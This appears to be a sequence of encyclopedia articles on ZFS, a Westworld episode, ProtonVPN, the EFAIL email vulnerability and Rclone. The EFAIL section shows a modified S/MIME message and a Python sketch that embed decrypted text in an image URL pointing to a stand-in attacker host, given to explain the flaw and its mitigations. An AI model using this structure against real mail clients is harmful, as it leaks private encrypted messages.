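The snapshot and clone mechanics above map directly onto `zfs` commands; dataset and snapshot names here are placeholders:

```shell
# Near-instant snapshot; it shares all unchanged blocks with the live data.
zfs snapshot tank/data@before-upgrade
zfs list -t snapshot                            # snapshots are read-only
# Writable clone that continues to share unchanged blocks with the snapshot.
zfs clone tank/data@before-upgrade tank/trial
# Wind the live dataset back to the snapshot, discarding later writes.
zfs rollback tank/data@before-upgrade
```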
Sending and receiving snapshots ZFS file systems can be moved to other pools, also on remote hosts over the network, as the send command creates a stream representation of the file system's state. This stream can either describe complete contents of the file system at a given snapshot, or it can be a delta between snapshots. Computing the delta stream is very efficient, and its size depends on the number of blocks changed between the snapshots. This provides an efficient strategy, e.g., for synchronizing offsite backups or high availability mirrors of a pool. Dynamic striping Dynamic striping across all devices to maximize throughput means that as additional devices are added to the zpool, the stripe width automatically expands to include them; thus, all disks in a pool are used, which balances the write load across them. Variable block sizes ZFS uses variable-sized blocks, with 128 KB as the default size. Available features allow the administrator to tune the maximum block size which is used, as certain workloads do not perform well with large blocks. If data compression is enabled, variable block sizes are used. If a block can be compressed to fit into a smaller block size, the smaller size is used on the disk to use less storage and improve IO throughput (though at the cost of increased CPU use for the compression and decompression operations). Lightweight filesystem creation In ZFS, filesystem manipulation within a storage pool is easier than volume manipulation within a traditional filesystem; the time and effort required to create or expand a ZFS filesystem is closer to that of making a new directory than it is to volume manipulation in some other systems. Adaptive endianness Pools and their associated ZFS file systems can be moved between different platform architectures, including systems implementing different byte orders. 
The ZFS block pointer format stores filesystem metadata in an endian-adaptive way; individual metadata blocks are written with the native byte order of the system writing the block. When reading, if the stored endianness does not match the endianness of the system, the metadata is byte-swapped in memory. This does not affect the stored data; as is usual in POSIX systems, files appear to applications as simple arrays of bytes, so applications creating and reading data remain responsible for doing so in a way independent of the underlying system's endianness. Deduplication Data deduplication capabilities were added to the ZFS source repository at the end of October 2009, and relevant OpenSolaris ZFS development packages have been available since December 3, 2009 (build 128). Effective use of deduplication may require large RAM capacity; recommendations range between 1 and 5 GB of RAM for every TB of storage. An accurate assessment of the memory required for deduplication is made by referring to the number of unique blocks in the pool, and the number of bytes on disk and in RAM ("core") required to store each record—these figures are reported by inbuilt commands such as zpool and zdb. Insufficient physical memory or lack of ZFS cache can result in virtual memory thrashing when using deduplication, which can cause performance to plummet, or result in complete memory starvation. Because deduplication occurs at write-time, it is also very CPU-intensive and this can also significantly slow down a system. Other storage vendors use modified versions of ZFS to achieve very high data compression ratios. Two examples in 2012 were GreenBytes and Tegile. In May 2014, Oracle bought GreenBytes for its ZFS deduplication and replication technology. 
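Given these resource costs, deduplication is usually assessed before it is enabled; one possible workflow, with pool and dataset names as placeholders:

```shell
# Simulate deduplication on the existing data of a (hypothetical) pool: zdb prints
# a histogram of duplicate blocks and an estimated dedup ratio, which helps gauge
# the RAM cost of the dedup table before committing to it.
zdb -S tank
# Enable deduplication only on a dataset whose data is known to deduplicate well.
zfs set dedup=on tank/vm-images
```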
As described above, deduplication is usually not recommended due to its heavy resource requirements (especially RAM) and impact on performance (especially when writing), other than in specific circumstances where the system and data are well-suited to this space-saving technique. Additional capabilities Explicit I/O priority with deadline scheduling. Claimed globally optimal I/O sorting and aggregation. Multiple independent prefetch streams with automatic length and stride detection. Parallel, constant-time directory operations. End-to-end checksumming, using a kind of "Data Integrity Field", allowing data corruption detection (and recovery if you have redundancy in the pool). A choice of 3 hashes can be used, optimized for speed (fletcher), standardization and security (SHA256) and salted hashes (Skein). Transparent filesystem compression. Supports LZJB, gzip, LZ4 and Zstd. Intelligent scrubbing and resilvering (resyncing). Load and space usage sharing among disks in the pool. Ditto blocks: Configurable data replication per filesystem, with zero, one or two extra copies requested per write for user data, and with that same base number of copies plus one or two for metadata (according to metadata importance). If the pool has several devices, ZFS tries to replicate over different devices. Ditto blocks are primarily an additional protection against corrupted sectors, not against total disk failure. ZFS design (copy-on-write + superblocks) is safe when using disks with write cache enabled, if they honor the write barriers. This feature provides safety and a performance boost compared with some other filesystems. On Solaris, when entire disks are added to a ZFS pool, ZFS automatically enables their write cache. This is not done when ZFS only manages discrete slices of the disk, since it does not know if other slices are managed by non-write-cache safe filesystems, like UFS. 
The FreeBSD implementation can handle disk flushes for partitions thanks to its GEOM framework, and therefore does not suffer from this limitation. Per-user, per-group, per-project, and per-dataset quota limits. Filesystem encryption since Solaris 11 Express, and OpenZFS (ZoL) 0.8. (on some other systems ZFS can utilize encrypted disks for a similar effect; GELI on FreeBSD can be used this way to create fully encrypted ZFS storage). Pools can be imported in read-only mode. It is possible to recover data by rolling back entire transactions at the time of importing the zpool. ZFS is not a clustered filesystem; however, clustered ZFS is available from third parties. Snapshots can be taken manually or automatically. The older versions of the stored data that they contain can be exposed as full read-only file systems. They can also be exposed as historic versions of files and folders when used with CIFS (also known as SMB, Samba or file shares); this is known as "Previous versions", "VSS shadow copies", or "File history" on Windows, or AFP and "Apple Time Machine" on Apple devices. Disks can be marked as 'spare'. A data pool can be set to automatically and transparently handle disk faults by activating a spare disk and beginning to resilver the data that was on the suspect disk onto it, when needed. Limitations There are several limitations of the ZFS filesystem. Limitations in preventing data corruption The authors of a 2010 study that examined the ability of file systems to detect and prevent data corruption, with particular focus on ZFS, observed that ZFS itself is effective in detecting and correcting data errors on storage devices, but that it assumes data in RAM is "safe", and not prone to error. 
The study comments that "a single bit flip in memory causes a small but non-negligible percentage of runs to experience a failure, with the probability of committing bad data to disk varying from 0% to 3.6% (according to the workload)", and that when ZFS caches pages or stores copies of metadata in RAM, or holds data in its "dirty" cache for writing to disk, no test is made whether the checksums still match the data at the point of use. Much of this risk can be mitigated in one of two ways: According to the authors, by using ECC RAM; however, the authors considered that adding error detection related to the page cache and heap would allow ZFS to handle certain classes of error more robustly. One of the main architects of ZFS, Matt Ahrens, explains there is an option to enable checksumming of data in memory by using the ZFS_DEBUG_MODIFY flag (zfs_flags=0x10), which addresses these concerns. Other limitations specific to ZFS Capacity expansion is normally achieved by adding groups of disks as a top-level vdev: simple device, RAID-Z, RAID Z2, RAID Z3, or mirrored. Newly written data will dynamically start to use all available vdevs. It is also possible to expand the array by iteratively swapping each drive in the array with a bigger drive and waiting for ZFS to self-heal; the heal time will depend on the amount of stored information, not the disk size. As of Solaris 10 Update 11 and Solaris 11.2, it was neither possible to reduce the number of top-level vdevs in a pool except hot spares, cache, and log devices, nor to otherwise reduce pool capacity. This functionality was said to be in development in 2007. Enhancements to allow reduction of vdevs are under development in OpenZFS. Online shrinking by removing non-redundant top-level vdevs is supported since Solaris 11.4, released in August 2018, and OpenZFS (ZoL) 0.8, released in May 2019. It was not possible to add a disk as a column to a RAID Z, RAID Z2 or RAID Z3 vdev.
However, a new RAID Z vdev can be created instead and added to the zpool. Some traditional nested RAID configurations, such as RAID 51 (a mirror of RAID 5 groups), are not configurable in ZFS without some third-party tools. Vdevs can only be composed of raw disks or files, not other vdevs, using the default ZFS management commands. However, a ZFS pool effectively creates a stripe (RAID 0) across its vdevs, so the equivalent of a RAID 50 or RAID 60 is common. Reconfiguring the number of devices in a top-level vdev requires copying data offline, destroying the pool, and recreating the pool with the new top-level vdev configuration. The exceptions are adding extra redundancy to an existing mirror, which can be done at any time, and, if all top-level vdevs are mirrors with sufficient redundancy, using the zpool split command to remove a vdev from each top-level vdev in the pool, creating a second pool with identical data. IOPS performance of a ZFS storage pool can suffer if the ZFS raid is not appropriately configured. This applies to all types of RAID, in one way or another. If the zpool consists of only one group of disks configured as, say, eight disks in RAID Z2, then the IOPS performance will be that of a single disk (write speed will be equivalent to 6 disks, but random read speed will be similar to a single disk). However, there are ways to mitigate this IOPS performance problem, for instance adding SSDs as L2ARC cache, which can boost IOPS into the 100,000s. In short, a zpool should consist of several groups of vdevs, each vdev consisting of 8–12 disks, if using RAID Z. It is not recommended to create a zpool with a single large vdev, say 20 disks, because IOPS performance will be that of a single disk, which also means that resilver time will be very long (possibly weeks with future large drives). Resilver (repair) of a failed disk in a ZFS RAID can take a long time; this is not unique to ZFS, and applies to all types of RAID in one way or another.
This means that very large volumes can take several days to repair or to bring back to full redundancy after severe data corruption or failure, and during this time a second disk failure may occur, especially as the repair puts additional stress on the system as a whole. In turn this means that configurations that only allow for recovery of a single disk failure, such as RAID Z1 (similar to RAID 5), should be avoided. Therefore, with large disks, one should use RAID Z2 (allowing two disks to fail) or RAID Z3 (allowing three disks to fail). ZFS RAID differs from conventional RAID by only reconstructing live data and metadata when replacing a disk, not the entirety of the disk including blank and garbage blocks, which means that replacing a member disk on a ZFS pool that is only partially full will take proportionally less time compared to conventional RAID. Data recovery Historically, ZFS has not shipped with tools such as fsck to repair damaged file systems, because the file system itself was designed to self-repair, so long as it had been built with sufficient attention to the design of storage and redundancy of data. If the pool was compromised because of poor hardware, inadequate design or redundancy, or unfortunate mishap, to the point that ZFS was unable to mount the pool, traditionally there were no tools which allowed an end-user to attempt partial salvage of the stored data. This led to threads in online forums where ZFS developers sometimes tried to provide ad-hoc help to home and other small-scale users facing loss of data due to their inadequate design or poor system management. Modern ZFS has improved considerably on this situation over time, and continues to do so: Removal or abrupt failure of caching devices no longer causes pool loss. (At worst, loss of the ZIL may lose very recent transactions, but the ZIL does not usually store more than a few seconds' worth of recent transactions. Loss of the L2ARC cache does not affect data.)
If the pool is unmountable, modern versions of ZFS will attempt to identify the most recent consistent point at which the pool can be recovered, at the cost of losing some of the most recent changes to the contents. Copy on write means that older versions of data, including top-level records and metadata, may still exist even though they are superseded, and if so, the pool can be wound back to a consistent state based on them. The older the data, the more likely it is that at least some blocks have been overwritten and that some data will be irrecoverable, so at some point there is a limit on the ability of the pool to be wound back. Informally, tools exist to probe the reason why ZFS is unable to mount a pool, and guide the user or a developer as to manual changes required to force the pool to mount. These include using zdb (ZFS debug) to find a valid importable point in the pool, using dtrace or similar to identify the issue causing mount failure, or manually bypassing health checks that cause the mount process to abort, allowing the damaged pool to be mounted. A range of significantly enhanced methods is gradually being rolled out within OpenZFS. These include: Code refactoring, and more detailed diagnostic and debug information on mount failures, to simplify diagnosis and fixing of corrupt pool issues; The ability to trust or distrust the stored pool configuration. This is particularly powerful, as it allows a pool to be mounted even when top-level vdevs are missing or faulty, when top-level data is suspect, and also to rewind beyond a pool configuration change if that change was connected to the problem. Once the corrupt pool is mounted, readable files can be copied for safety, and it may turn out that data can be rebuilt even for missing vdevs, by using copies stored elsewhere in the pool.
The ability to fix the situation where a disk needed in one pool was accidentally removed and added to a different pool, causing it to lose metadata related to the first pool, which becomes unreadable. OpenZFS and ZFS Oracle Corporation ceased the public development of both ZFS and OpenSolaris after the acquisition of Sun in 2010. Some developers forked the last public release of OpenSolaris as the Illumos project. Because of the significant advantages present in ZFS, it has been ported to several different platforms with different features and commands. For coordinating the development efforts and to avoid fragmentation, OpenZFS was founded in 2013. According to Matt Ahrens, one of the main architects of ZFS, over 50% of the original OpenSolaris ZFS code had been replaced in OpenZFS with community contributions as of 2019, making “Oracle ZFS” and “OpenZFS” politically and technologically incompatible. Commercial and open source products 2008: Sun shipped a line of ZFS-based 7000-series storage appliances. 2013: Oracle shipped the ZS3 series of ZFS-based filers and seized first place in the SPC-2 benchmark with one of them. 2013: iXsystems ships ZFS-based NAS devices called FreeNAS (now named TrueNAS CORE) for SOHO, and TrueNAS for the enterprise. 2014: Netgear ships a line of ZFS-based NAS devices called ReadyDATA, designed to be used in the enterprise. 2015: rsync.net announces a cloud storage platform that allows customers to provision their own zpool and import and export data using zfs send and zfs receive. 2020: iXsystems begins development of ZFS-based hyperconverged software called TrueNAS SCALE for SOHO, and TrueNAS for the enterprise. Oracle Corporation, closed source, and forking (from 2010) In January 2010, Oracle Corporation acquired Sun Microsystems, and quickly discontinued the OpenSolaris distribution and the open source development model.
In August 2010, Oracle discontinued providing public updates to the source code of the Solaris OS/Networking repository, effectively turning Solaris 11 back into a closed source proprietary operating system. In response to the changing landscape of Solaris and OpenSolaris, the illumos project was launched via webinar on Thursday, August 3, 2010, as a community effort of some core Solaris engineers to continue developing the open source version of Solaris, and complete the open sourcing of those parts not already open sourced by Sun. illumos was founded as a Foundation, the illumos Foundation, incorporated in the State of California as a 501(c)6 trade association. The original plan explicitly stated that illumos would not be a distribution or a fork. However, after Oracle announced discontinuing OpenSolaris, plans were made to fork the final version of the Solaris ON, allowing illumos to evolve into an operating system of its own. As part of OpenSolaris, an open source version of ZFS was therefore integral within illumos. ZFS was widely used within numerous platforms, as well as Solaris. Therefore, in 2013, the co-ordination of development work on the open source version of ZFS was passed to an umbrella project, OpenZFS. The OpenZFS framework allows any interested parties to collaboratively develop the core ZFS codebase in common, while individually maintaining any specific extra code which ZFS requires to function and integrate within their own systems. Version history Note: The Solaris version under development by Sun since the release of Solaris 10 in 2005 was codenamed 'Nevada', and was derived from what was the OpenSolaris codebase. 'Solaris Nevada' is the codename for the next-generation Solaris OS to eventually succeed Solaris 10 and this new code was then pulled successively into new OpenSolaris 'Nevada' snapshot builds. OpenSolaris is now discontinued and OpenIndiana forked from it. 
A final build (b134) of OpenSolaris was published by Oracle (2010-Nov-12) as an upgrade path to Solaris 11 Express. List of operating systems supporting ZFS List of operating systems, distributions and add-ons that support ZFS, the zpool version they support, and the Solaris build they are based on (if any): See also Comparison of file systems List of file systems Versioning file system – List of versioning file systems Notes References Bibliography External links Fork Yeah! The Rise and Development of illumos - slide show covering much of the history of Solaris, the decision to open source by Sun, the creation of ZFS, and the events causing it to be closed sourced and forked after Oracle's acquisition. The best cloud File System was created before the cloud existed (archived on Dec. 15, 2018) Comparison of SVM mirroring and ZFS mirroring EON ZFS Storage (NAS) distribution End-to-end Data Integrity for File Systems: A ZFS Case Study ZFS – The Zettabyte File System (archived on Feb. 28, 2013) ZFS and RAID-Z: The Über-FS? ZFS: The Last Word In File Systems, by Jeff Bonwick and Bill Moore (archived on Aug. 29, 2017) Visualizing the ZFS intent log (ZIL), April 2013, by Aaron Toponce Features of illumos including OpenZFS Previous wiki page with more links: Getting Started with ZFS, Sep. 15, 2014 (archived on Dec. 30, 2018), part of the illumos documentation
57317517
https://en.wikipedia.org/wiki/The%20Passenger%20%28Westworld%29
The Passenger (Westworld)
"The Passenger" is the tenth and final episode of the second season of the HBO science fiction western thriller television series Westworld. The episode aired on June 24, 2018. It was written by series co-creators Jonathan Nolan and Lisa Joy, and directed by Frederick E.O. Toye. The episode's plot deals with all characters in the past converging at the Valley Beyond, Bernard's choices regarding Dolores and Strand, and the final plot twist connecting both timelines of the season. The episode also includes a post-credits scene, much like the first season's finale. "The Passenger" received generally positive reviews, although it became, at 72%, the lowest rated episode at Rotten Tomatoes in the second season. Critics praised the resolution of the plot as well as the performances of the cast, especially those of Evan Rachel Wood, Jeffrey Wright, Thandiwe Newton and Tessa Thompson, but the final plot twist and the highly convoluted nature of the episode drew some criticism. The episode was nominated at the 70th Primetime Creative Arts Emmy Awards for Outstanding Special Visual Effects and was also Jeffrey Wright's pick to support his nomination for Outstanding Lead Actor. This episode marks the final appearances of Anthony Hopkins (Robert Ford), James Marsden (Theodore "Teddy" Flood), Ingrid Bolsø Berdal (Armistice), Shannon Woodward (Elsie Hughes), Ben Barnes (Logan Delos), Fares Fares (Antoine Costa), Louis Herthum (Peter Abernathy), Gustaf Skarsgård (Karl Strand) and Zahn McClarnon (Akecheta). Plot summary Hector, Armistice, Lee and Hanaryo rush to the Mesa to save Maeve, only to watch her save herself. They regroup with Felix and Sylvester and travel to the Valley to find Maeve's daughter. Lee sacrifices himself to delay Delos' security forces. Meanwhile, Dolores encounters William and coerces him to come with her to the Forge, where they find Bernard. It is revealed that Dolores had made Bernard purposely different from Arnold when she tested his fidelity. 
William tries to kill Dolores, but, unbeknownst to him, Dolores had earlier sabotaged his gun, which backfires, severely wounding his hand. Once inside the Forge, Dolores uses the encryption key from Peter to access its digital space. She and Bernard meet the system controller, who has the appearance of Logan Delos. The controller had been tasked with trying to create a digital version of James Delos, discovering that James' actions all stemmed from his last conversation with Logan before Logan overdosed. From this, the controller found that every guest's consciousness was deceptively simple to create code for, and all of these now are stored in a library-like setting within the Forge. The controller tells Bernard that he is the key to opening the Door, a giant underground system transfer unit that allows hosts to upload their programming to "the Sublime", a virtual space inaccessible to humans. Outside, Akecheta and the Ghost Nation lead several hosts to the Door, and start ushering them through to the Sublime. Charlotte and the Delos team arrive with the reprogrammed Clementine, who causes hosts to attack each other. Hector, Armistice and Hanaryo sacrifice themselves to allow Maeve to find her daughter. She uses her powers to halt the hosts, giving Akecheta and her daughter time to flee before she is shot by Charlotte's men. Akecheta finds that Maeve implanted his partner Kohana's persona within her daughter, allowing them to reunite in the Sublime. Inside the Forge, Dolores rejects the Sublime, arguing that it is just another false reality designed to control the hosts. She begins purging the Forge of the guests' memories and engages the override system to flood the valley. Outraged by her radical actions, Bernard kills Dolores and stops the purge but cannot prevent the flooding. Outside, he is met by Charlotte and Elsie and taken back to the Mesa, where the latter locks him up until they decide what to do with him. 
Elsie confronts Charlotte about the true purpose of Westworld and Charlotte kills her. Having witnessed it all, Bernard summons Ford and begs for help. In the present, Strand, Charlotte and Bernard reach the drained Forge and the former prepares to transfer the guest data via satellite when Bernard starts to remember. He recalls that he had taken Dolores' control unit and, following Ford's indications, created a new host body for it in the form of Charlotte. Dolores-Charlotte had then killed the real Charlotte and Bernard had deliberately scrambled his memories to prevent Strand from learning the truth from him. At this point, Charlotte reveals herself to be Dolores, killing Strand and the rest of the Delos team. She uploads Teddy's personality and uses the satellite uplink to transfer the hosts and the Sublime to a secret location. Dolores asks Bernard to trust her and shoots him. Dolores-Charlotte joins the Delos evacuation team, taking several host cores with her. Stubbs realizes she is a host, but as he has become disenchanted with Delos' principles, allows her to leave with a monologue that confirms he is himself a host. At Arnold's home, Dolores finds a host printer left for her by Ford. She creates new bodies for herself and Bernard. Dolores reactivates him, cautioning him that while they may be enemies, they need each other to ensure the survival of the hosts in the human world. As Dolores and a new Charlotte leave, Bernard finally steps into the real world. In a flash-forward, William arrives at the Forge, only to find it is the far future. He is taken to quarters and is interviewed by a woman who looks just like his daughter Emily, testing his fidelity. Production The post-credits scene involving William and Emily was originally scripted to occur near the middle of the episode, at around the same time Bernard leaves the Forge after killing Dolores. Director Frederick E.O. 
Toye said that production found that having this scene in the middle of the episode would be too confusing to viewers as "there are such exhausting, mental exercises that you had to go through to get to it". The scene was then moved to the post-credits slot. Music The episode's last scene features a cover of Radiohead's "Codex". However, at one point, the cover merges with the original version, which continues to play during the final credits. This marks the first time that both a cover and the original version of a song play in an episode of the series. The official soundtrack includes only Ramin Djawadi's cover. Reception "The Passenger" was watched by 1.56 million viewers during its initial airing, and received a 0.6 18–49 rating, even with the previous week. The episode received generally positive reviews from critics, although criticism was aimed at the convoluted nature of the story. At Rotten Tomatoes, the episode has a 73% approval rating with an average score of 7.71/10, from 44 reviews. The website's critical consensus reads: "Compelling performances keep 'The Passenger' afloat among a flood of frustrating, fascinating twists, though in true Westworld fashion it may leave some viewers exhausted." References External links at HBO.com 2018 American television episodes Westworld (TV series) episodes Television episodes written by Jonathan Nolan
57413696
https://en.wikipedia.org/wiki/ProtonVPN
ProtonVPN
ProtonVPN is a VPN service operated by the Swiss company Proton Technologies AG, the company behind the email service ProtonMail. According to its official website, ProtonVPN and ProtonMail share the same management team, offices, and technical resources, and are operated from Proton's headquarters in Geneva, Switzerland under the protection of Swiss privacy laws. Company Proton Technologies AG, the company behind ProtonVPN and the email service ProtonMail, is supported by FONGIT (the Fondation Genevoise pour l'Innovation Technologique, a non-profit foundation financed by the Swiss Federal Commission for Technology and Innovation) and the European Commission. Features As of 3 December 2021, ProtonVPN has a total of 1,529 servers, located in 61 countries. All servers are owned and operated by ProtonVPN through the company's network. Its service is available for Windows, macOS, Android, and iOS; a command-line tool is available for Linux, and connections can also be configured manually using the IPsec protocol. ProtonVPN utilizes OpenVPN (UDP/TCP) and the IKEv2 protocol, with AES-256 encryption. The company has a strict no-logging policy for user connection data, and also prevents DNS and WebRTC leaks from exposing users' true IP addresses. ProtonVPN also includes Tor access support and a kill switch to shut off Internet access in the event of a lost VPN connection. In January 2020, ProtonVPN released its source code on all platforms and had SEC Consult conduct an independent security audit. In July 2021, ProtonVPN added support for the WireGuard protocol as a beta feature. Reception In a September 2019 review by TechRadar, ProtonVPN received four-and-a-half out of five stars. The review read, "ProtonVPN's network is small, and we had some performance issues during testing. Still, speeds are generally better than average, the apps are well-designed and we have to applaud any genuine VPN which offers a free, unlimited bandwidth plan." 
A November 2018 review of the free version by the same TechRadar writer concluded: "If you can live with a choice of only three locations, ProtonVPN's free plan is an excellent choice – there are no bandwidth limits, decent speeds, a privacy policy you can believe (probably) and clients for desktops and mobile devices. It's well worth checking out, if only as a backup for your existing VPN service." A February 2019 PC Magazine UK review rated ProtonVPN at 4 out of 5, saying "When we first reviewed ProtonVPN, it was a young service looking to expand. It certainly has done that, and the service is definitely better now. It's still unclear if the company will be able to scale up to match its competitors, given its exacting standards for physical security. But that's a worry for the future. Right now, ProtonVPN is an excellent service at an unbeatable range of prices." The non-profit organization Privacy Guides, formerly called PrivacyTools, has developed a comprehensive list of VPN Provider Criteria in order to objectively recommend VPNs. Only three VPNs had fulfilled those criteria. ProtonVPN is the second of those three recommended VPN services. See also Comparison of virtual private network services Internet privacy Encryption Secure communication References Internet privacy Virtual private network services
57415935
https://en.wikipedia.org/wiki/EFAIL
EFAIL
Efail, also written EFAIL, is a security vulnerability in email systems that support the transmission of encrypted content. The vulnerability allows attackers to access the decrypted content of an email if it contains active content like HTML or JavaScript, or if loading of external content has been enabled in the client. Affected email clients include Gmail, Apple Mail, and Microsoft Outlook. Two related Common Vulnerabilities and Exposures (CVE) IDs have been issued. The vulnerability was made public on 13 May 2018 by Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky and Jörg Schwenk as part of a contribution to the 27th USENIX Security Symposium, Baltimore, August 2018. As a result of the vulnerability, the content of an attacked encrypted email can be transmitted to the attacker in plain text by a vulnerable email client. The encryption keys themselves are not disclosed. Description The vulnerability concerns many common email programs when used with the email encryption systems OpenPGP and S/MIME. An attacker needs access to the attacked email message in its encrypted form, as well as the ability to send an email to at least one regular recipient of this original email. To exploit the vulnerability, the attacker modifies the encrypted email, causing the recipient's email program to send the decrypted content of the email to the attacker. To access the decrypted content of an encrypted email, the attacker modifies the targeted email so that it contains text prepared by the attacker in a specific way. The attacker then sends the changed email to one of the regular recipients. The attacker inserts additional text before and after the encrypted text in the encrypted email, thereby changing the message so that a multipart/mixed (MIME) message is created and the encrypted part of the message appears, together with the boundary markers of the MIME message, as a parameter value of an HTML tag. Example of a modified S/MIME mail: [...] 
Content-Type: multipart/mixed;boundary="BOUNDARY"
[...]
--BOUNDARY
Content-Type: text/html

<img src="http://attacker.chosen.url/
--BOUNDARY
Content-Type: application/pkcs7-mime; smime-type=enveloped-data
Content-Transfer-Encoding: base64

ENCRYPTEDMESSAGEENCRYPTEDMESSAGEENCRYPTEDMESSAGEENCRYPTEDMESSAGE
--BOUNDARY
Content-Type: text/html

">
--BOUNDARY
...

The email client first breaks down the multipart message into its individual parts using the --BOUNDARY marker and then decrypts the encrypted parts. It then reassembles the multipart message, and receives the message in this form:

[...]
Content-Type: multipart/mixed;boundary="BOUNDARY"
[...]
--BOUNDARY
Content-Type: text/html

<img src="http://attacker.chosen.url/
SECRETMESSAGESECRETMESSAGE">
--BOUNDARY
...

This message now contains the decrypted content of the email in the src= attribute of the <img> tag, and the email program passes it as a URL to the web server attacker.chosen.url, controlled by the attacker, when this content is requested. The attacker can then retrieve the content of the encrypted message from the web server's logs. In a variant of the attack, the attacker exploits a vulnerability in the CBC (S/MIME) and CFB (OpenPGP) modes of operation of the encryption algorithms used. This allows the attacker to change the ciphertext by inserting so-called gadgets. As a side effect of this manipulation, the originally contained plaintext becomes illegible. If that plaintext is known, the attacker can correct this by inserting additional gadgets. The attacker can hide unknown plaintext by inserting certain HTML tags. The result is a message with a structure similar to that described above. Mitigations Since the vulnerability is directed against the content of the email and not against the recipient, it is necessary that all recipients implement the countermeasures. These include:
Disable active content such as HTML or JavaScript when viewing emails.
Suppress automatic reloading of external content, such as images. 
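The direct-exfiltration structure described above can be illustrated with a minimal Python sketch. This is not an exploit: the part names, the ENC: prefix, and the toy "decryption" function are hypothetical stand-ins for genuine S/MIME or OpenPGP processing, used only to show how a naive client that decrypts and then reassembles parts ends up embedding plaintext in an attacker-controlled URL.

```python
# Illustrative sketch (assumptions: toy "ENC:" marker stands in for a real
# encrypted MIME part; attacker.chosen.url is the example host from the text).

def attacker_wrap(ciphertext_part: str) -> list:
    """Wrap the stolen encrypted part between two attacker-chosen HTML parts,
    so the decrypted text lands inside an <img src=...> attribute."""
    return [
        '<img src="http://attacker.chosen.url/',  # opens the src attribute
        ciphertext_part,                          # victim's client decrypts this
        '">',                                     # closes the attribute
    ]

def naive_client_render(parts: list, decrypt) -> str:
    """A vulnerable client decrypts each encrypted part, then glues all
    parts back together into one HTML document."""
    return "".join(decrypt(p) if p.startswith("ENC:") else p for p in parts)

# Toy stand-ins for the ciphertext and its decryption.
stolen_part = "ENC:SECRETMESSAGE"
decrypt = lambda p: p.removeprefix("ENC:")

html = naive_client_render(attacker_wrap(stolen_part), decrypt)
print(html)  # <img src="http://attacker.chosen.url/SECRETMESSAGE">
```

Rendering this HTML would make the client request the URL, delivering SECRETMESSAGE to the attacker's server log; this is why suppressing remote content loading blocks the exfiltration channel.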
To what extent even the senders of encrypted content can reduce the vulnerability, e.g. by electronic signatures or the limitation to a subset of MIME formats, has not yet been conclusively clarified. Critique When announcing the security vulnerability on 13 May 2018, the Electronic Frontier Foundation (EFF) recommended that users stop using any PGP plugins in email programs, even though the vulnerability does not relate directly to PGP but to the configuration of an email program. A coordinated publication had originally been scheduled for 15 May. Various parties criticized the EFF for ignoring this embargo. As a consequence, Robert Hansen recommended establishing a closed group or mailing list to better coordinate the publication of future security issues. Still, he saw the EFF and its director Danny O'Brien as the best entity to administer such an "OpenPGP Disclosure Group". References Further reading External links Official website Email hacking Computer security exploits
57435695
https://en.wikipedia.org/wiki/Rclone
Rclone
Rclone is an open-source, multi-threaded, command-line computer program to manage or migrate content on cloud and other high-latency storage. Its capabilities include sync, transfer, crypt, cache, union, compress and mount. The rclone website lists supported backends including S3 and Google Drive. Descriptions of rclone often carry the strapline "Rclone syncs your files to cloud storage". Those prior to 2020 include the alternative "Rsync for Cloud Storage". Users have called rclone "The Swiss Army Knife of cloud storage". Rclone is well known for its rclone sync and rclone mount commands. It provides further management functions analogous to those ordinarily used for files on local disks, but which tolerate some intermittent and unreliable service. Rclone is commonly used as a front-end for media servers such as Plex, Emby or Jellyfin to stream content directly from consumer file storage services. Official Ubuntu, Debian, Fedora, Gentoo, Arch, Brew, Chocolatey, and other package managers include rclone. History Nick Craig-Wood was inspired by rsync. Concerns about the noise and power costs of home computer servers prompted him to embrace cloud storage. He began developing rclone as open-source software in 2012 under the name swiftsync. Rclone was promoted to stable version 1.00 in July 2014. In May 2017 Amazon barred new rclone users from its consumer Amazon Drive file storage product. Amazon Drive had been advertised as offering unlimited storage for £55 per year. Amazon blamed security concerns and also banned other upload utilities. Amazon's AWS S3 service continues to support new rclone users. The original rclone logo was retired and replaced with the present one in September 2018. In March 2020 Nick Craig-Wood resigned from Memset Ltd, a cloud hosting company he founded, to focus on open-source software. 
Amazon's AWS April 2020 public sector blog explained how the Fred Hutch Cancer Research Center was using rclone in its Motuz tool to migrate very large biomedical research datasets in and out of AWS S3 object stores. In November 2020 rclone was updated to correct a weakness in the way it generated passwords. Passwords for encrypted remotes can be generated randomly by rclone or supplied by the user. In all versions of rclone from 1.49.0 to 1.53.2 the seed value for generated passwords was based on the number of seconds elapsed in the day, and therefore not truly random. CVE-2020-28924 recommended users upgrade to the latest version of rclone and check the passwords protecting their encrypted remotes. Release 1.55 of rclone in March 2021 included features sponsored by CERN and their CS3MESH4EOSC project. The work was EU-funded to promote vendor-neutral application programming interfaces and protocols for synchronisation and sharing of academic data on cloud storage. Backends and Commands Rclone supports numerous services as backends. Other backends built on standard protocols such as WebDAV or S3 also work. WebDAV backends do not support rclone functionality dependent on server-side checksums or modtimes. Remotes are usually defined interactively from these backends, local disk, or memory (as S3), with rclone config. Rclone can further wrap those remotes with one or more of alias, chunk, compress, crypt or union remotes. Once defined, the remotes are referenced by other rclone commands interchangeably with the local drive. Remote names are followed by a colon to distinguish them from local drives. For example, a remote example_remote containing a folder, or pseudofolder, myfolder is referred to within a command as the path example_remote:/myfolder. Rclone commands apply directly to remotes, or mount them for file access or streaming. With appropriate cache options the mount can be addressed as if it were a conventional, block-level disk. 
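The password-generation weakness described above (CVE-2020-28924) can be illustrated with a short, hypothetical sketch. This is not rclone's actual Go implementation; it simply shows why seeding a pseudo-random generator with the number of seconds elapsed in the day caps the entire password space at 86,400 possibilities, which an attacker can enumerate in moments.

```python
# Hypothetical re-creation of the CVE-2020-28924 class of weakness:
# a PRNG seeded with the second-of-day can only produce 86,400 outcomes.
import random
import string

def weak_password(seconds_of_day: int, length: int = 22) -> str:
    rng = random.Random(seconds_of_day)  # seed is in range 0..86399
    alphabet = string.ascii_letters + string.digits
    return "".join(rng.choice(alphabet) for _ in range(length))

# An attacker can enumerate every possible generated password in one loop.
candidates = {weak_password(s) for s in range(86_400)}
print(len(candidates))  # at most 86,400 distinct passwords
```

By contrast, a truly random 22-character password over the same alphabet has roughly 62^22 possibilities, which is why the advisory told users to regenerate any passwords rclone had created for them.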
